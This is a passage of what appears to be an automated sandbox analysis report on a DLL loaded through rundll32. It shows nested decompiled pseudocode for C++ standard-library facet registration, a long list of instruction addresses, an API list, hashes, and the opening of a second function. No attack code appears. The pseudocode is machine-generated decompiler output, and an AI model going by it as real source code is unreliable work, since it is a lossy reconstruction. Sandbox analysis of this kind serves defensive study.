																																																																E6E206FD3(__eflags, _t941);
																																																																 *0x6e26a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t941 + 4))))();
																																																																 *0x6e2c6dcc = _t941;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t941 = _t964;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t940 =  *(_t990 - 0x10);
																																																													 *(_t990 - 0x10) = _t940;
																																																													 *(_t990 - 4) = 1;
																																																													E6E206FD3(__eflags, _t940);
																																																													 *0x6e26a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t940 + 4))))();
																																																													 *0x6e2c6dfc = _t940;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t940 = _t963;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t939 =  *(_t990 - 0x10);
																																																										 *(_t990 - 0x10) = _t939;
																																																										 *(_t990 - 4) = 1;
																																																										E6E206FD3(__eflags, _t939);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t939 + 4))))();
																																																										 *0x6e2c6de0 = _t939;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t939 = _t962;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t938 =  *(_t990 - 0x10);
																																																							 *(_t990 - 0x10) = _t938;
																																																							 *(_t990 - 4) = 1;
																																																							E6E206FD3(__eflags, _t938);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t938 + 4))))();
																																																							 *0x6e2c6ddc = _t938;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t938 = _t961;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t937 =  *(_t990 - 0x10);
																																																				 *(_t990 - 0x10) = _t937;
																																																				 *(_t990 - 4) = 1;
																																																				E6E206FD3(__eflags, _t937);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t937 + 4))))();
																																																				 *0x6e2c6db0 = _t937;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t937 = _t960;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t936 =  *(_t990 - 0x10);
																																																	 *(_t990 - 0x10) = _t936;
																																																	 *(_t990 - 4) = 1;
																																																	E6E206FD3(__eflags, _t936);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t936 + 4))))();
																																																	 *0x6e2c6dd8 = _t936;
																																																	goto L103;
																																																}
																																															} else {
																																																_t936 = _t959;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t935 =  *(_t990 - 0x10);
																																														 *(_t990 - 0x10) = _t935;
																																														 *(_t990 - 4) = 1;
																																														E6E206FD3(__eflags, _t935);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t935 + 4))))();
																																														 *0x6e2c6dc4 = _t935;
																																														goto L96;
																																													}
																																												} else {
																																													_t935 = _t958;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t934 =  *(_t990 - 0x10);
																																											 *(_t990 - 0x10) = _t934;
																																											 *(_t990 - 4) = 1;
																																											E6E206FD3(__eflags, _t934);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t934 + 4))))();
																																											 *0x6e2c6dc8 = _t934;
																																											goto L89;
																																										}
																																									} else {
																																										_t934 = _t957;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t933 =  *(_t990 - 0x10);
																																								 *(_t990 - 0x10) = _t933;
																																								 *(_t990 - 4) = 1;
																																								E6E206FD3(__eflags, _t933);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t933 + 4))))();
																																								 *0x6e2c6df4 = _t933;
																																								goto L82;
																																							}
																																						} else {
																																							_t933 = _t956;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t932 =  *(_t990 - 0x10);
																																					 *(_t990 - 0x10) = _t932;
																																					 *(_t990 - 4) = 1;
																																					E6E206FD3(__eflags, _t932);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t932 + 4))))();
																																					 *0x6e2c6df8 = _t932;
																																					goto L75;
																																				}
																																			} else {
																																				_t932 = _t955;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t931 =  *(_t990 - 0x10);
																																		 *(_t990 - 0x10) = _t931;
																																		 *(_t990 - 4) = 1;
																																		E6E206FD3(__eflags, _t931);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t931 + 4))))();
																																		 *0x6e2c6dc0 = _t931;
																																		goto L68;
																																	}
																																} else {
																																	_t931 = _t954;
																																	goto L68;
																																}
																															}
																														} else {
																															_t930 =  *(_t990 - 0x10);
																															 *(_t990 - 0x10) = _t930;
																															 *(_t990 - 4) = 1;
																															E6E206FD3(__eflags, _t930);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t930 + 4))))();
																															 *0x6e2c6df0 = _t930;
																															goto L61;
																														}
																													} else {
																														_t930 = _t953;
																														goto L61;
																													}
																												}
																											} else {
																												_t929 =  *(_t990 - 0x10);
																												 *(_t990 - 0x10) = _t929;
																												 *(_t990 - 4) = 1;
																												E6E206FD3(__eflags, _t929);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t929 + 4))))();
																												 *0x6e2c6dbc = _t929;
																												goto L54;
																											}
																										} else {
																											_t929 = _t952;
																											goto L54;
																										}
																									}
																								} else {
																									_t928 =  *(_t990 - 0x10);
																									 *(_t990 - 0x10) = _t928;
																									 *(_t990 - 4) = 1;
																									E6E206FD3(__eflags, _t928);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t928 + 4))))();
																									 *0x6e2c6dec = _t928;
																									goto L47;
																								}
																							} else {
																								_t928 = _t951;
																								goto L47;
																							}
																						}
																					} else {
																						_t927 =  *(_t990 - 0x10);
																						 *(_t990 - 0x10) = _t927;
																						 *(_t990 - 4) = 1;
																						E6E206FD3(__eflags, _t927);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t927 + 4))))();
																						 *0x6e2c6db8 = _t927;
																						goto L40;
																					}
																				} else {
																					_t927 = _t950;
																					goto L40;
																				}
																			}
																		} else {
																			_t926 =  *(_t990 - 0x10);
																			 *(_t990 - 0x10) = _t926;
																			 *(_t990 - 4) = 1;
																			E6E206FD3(__eflags, _t926);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t926 + 4))))();
																			 *0x6e2c6de8 = _t926;
																			goto L33;
																		}
																	} else {
																		_t926 = _t949;
																		goto L33;
																	}
																}
															} else {
																_t925 =  *(_t990 - 0x10);
																 *(_t990 - 0x10) = _t925;
																 *(_t990 - 4) = 1;
																E6E206FD3(__eflags, _t925);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t925 + 4))))();
																 *0x6e2c6dd4 = _t925;
																goto L26;
															}
														} else {
															_t925 = _t948;
															goto L26;
														}
													}
												} else {
													_t924 =  *(_t990 - 0x10);
													 *(_t990 - 0x10) = _t924;
													 *(_t990 - 4) = 1;
													E6E206FD3(__eflags, _t924);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t924 + 4))))();
													 *0x6e2c6db4 = _t924;
													goto L19;
												}
											} else {
												_t924 = _t947;
												goto L19;
											}
										}
									} else {
										_t923 =  *(_t990 - 0x10);
										 *(_t990 - 0x10) = _t923;
										 *(_t990 - 4) = 1;
										E6E206FD3(__eflags, _t923);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t923 + 4))))();
										 *0x6e2c6de4 = _t923;
										goto L12;
									}
								} else {
									_t923 = _t946;
									goto L12;
								}
							}
						} else {
							_t922 =  *(_t990 - 0x10);
							 *(_t990 - 0x10) = _t922;
							 *(_t990 - 4) = 1;
							E6E206FD3(__eflags, _t922);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t922 + 4))))();
							 *0x6e2c6e04 = _t922;
							goto L5;
						}
					} else {
						_t922 = _t945;
						goto L5;
					}
				}
			}








































































                          0x6e20eeeb
                          0x6e20eeeb
                          0x6e20eef2
                          0x6e20eefc
                          0x6e20ef01
                          0x6e20ef0c
                          0x6e20ef10
                          0x6e20ef13
                          0x6e20ef18
                          0x6e20ef1c
                          0x6e20ef21
                          0x6e20ef25
                          0x6e20ef6a
                          0x6e20ef6d
                          0x6e20ef79
                          0x6e20ef27
                          0x6e20ef29
                          0x6e20ef2f
                          0x6e20ef35
                          0x6e20ef3d
                          0x6e20ef40
                          0x6e20ef7d
                          0x6e20ef8b
                          0x6e20ef90
                          0x6e20ef98
                          0x6e20efa2
                          0x6e20efa7
                          0x6e20efb2
                          0x6e20efb6
                          0x6e20efb9
                          0x6e20efbe
                          0x6e20efc7
                          0x6e20efc9
                          0x6e20efcb
                          0x6e20f010
                          0x6e20f013
                          0x6e20f01f
                          0x6e20efcd
                          0x6e20efcd
                          0x6e20efcf
                          0x6e20efd5
                          0x6e20efdb
                          0x6e20efe3
                          0x6e20efe6
                          0x6e20f023
                          0x6e20f031
                          0x6e20f036
                          0x6e20f03e
                          0x6e20f048
                          0x6e20f04d
                          0x6e20f058
                          0x6e20f05c
                          0x6e20f05f
                          0x6e20f064
                          0x6e20f06d
                          0x6e20f06f
                          0x6e20f071
                          0x6e20f0b6
                          0x6e20f0b9
                          0x6e20f0c5
                          0x6e20f073
                          0x6e20f073
                          0x6e20f075
                          0x6e20f07b
                          0x6e20f081
                          0x6e20f089
                          0x6e20f08c
                          0x6e20f0c9
                          0x6e20f0d7
                          0x6e20f0dc
                          0x6e20f0e4
                          0x6e20f0ee
                          0x6e20f0f3
                          0x6e20f0fe
                          0x6e20f102
                          0x6e20f105
                          0x6e20f10a
                          0x6e20f113
                          0x6e20f115
                          0x6e20f117
                          0x6e20f15c
                          0x6e20f15f
                          0x6e20f16b
                          0x6e20f119
                          0x6e20f119
                          0x6e20f11b
                          0x6e20f121
                          0x6e20f127
                          0x6e20f12f
                          0x6e20f132
                          0x6e20f16f
                          0x6e20f17d
                          0x6e20f182
                          0x6e20f18a
                          0x6e20f194
                          0x6e20f199
                          0x6e20f1a4
                          0x6e20f1a8
                          0x6e20f1ab
                          0x6e20f1b0
                          0x6e20f1b9
                          0x6e20f1bb
                          0x6e20f1bd
                          0x6e20f202
                          0x6e20f205
                          0x6e20f211
                          0x6e20f1bf
                          0x6e20f1bf
                          0x6e20f1c1
                          0x6e20f1c7
                          0x6e20f1cd
                          0x6e20f1d5
                          0x6e20f1d8
                          0x6e20f215
                          0x6e20f223
                          0x6e20f228
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25f
                          0x6e20f261
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b
                          0x6e20f08e
                          0x6e20f08e
                          0x6e20f091
                          0x6e20f095
                          0x6e20f099
                          0x6e20f0a6
                          0x6e20f0ae
                          0x6e20f0b0
                          0x00000000
                          0x6e20f0b0
                          0x6e20f077
                          0x6e20f077
                          0x00000000
                          0x6e20f077
                          0x6e20f075
                          0x6e20efe8
                          0x6e20efe8
                          0x6e20efeb
                          0x6e20efef
                          0x6e20eff3
                          0x6e20f000
                          0x6e20f008
                          0x6e20f00a
                          0x00000000
                          0x6e20f00a
                          0x6e20efd1
                          0x6e20efd1
                          0x00000000
                          0x6e20efd1
                          0x6e20efcf
                          0x6e20ef42
                          0x6e20ef42
                          0x6e20ef45
                          0x6e20ef49
                          0x6e20ef4d
                          0x6e20ef5a
                          0x6e20ef62
                          0x6e20ef64
                          0x00000000
                          0x6e20ef64
                          0x6e20ef2b
                          0x6e20ef2b
                          0x00000000
                          0x6e20ef2b
                          0x6e20ef29

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20EEF2
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20EEFC
                          • int.LIBCPMT ref: 6E20EF13
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • codecvt.LIBCPMT ref: 6E20EF36
                          • std::_Facet_Register.LIBCPMT ref: 6E20EF4D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20EF6D
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20EF8B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                          • String ID: 0k,n
                          • API String ID: 2594415655-114697357
                          • Opcode ID: 8b756e5784a4f5490271d43bef1c0ecc3b16846255bc20116ac77fd3c7765d7a
                          • Instruction ID: 5986fe8daf7e90926c789368786eb62b9e312487daab31bd92e13b7db7bf81cc
                          • Opcode Fuzzy Hash: 8b756e5784a4f5490271d43bef1c0ecc3b16846255bc20116ac77fd3c7765d7a
                          • Instruction Fuzzy Hash: 9C11E375A1091ECBCF00EBE0C898AEDB77BAF44714F140909E4107B2D0DBB49E80CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
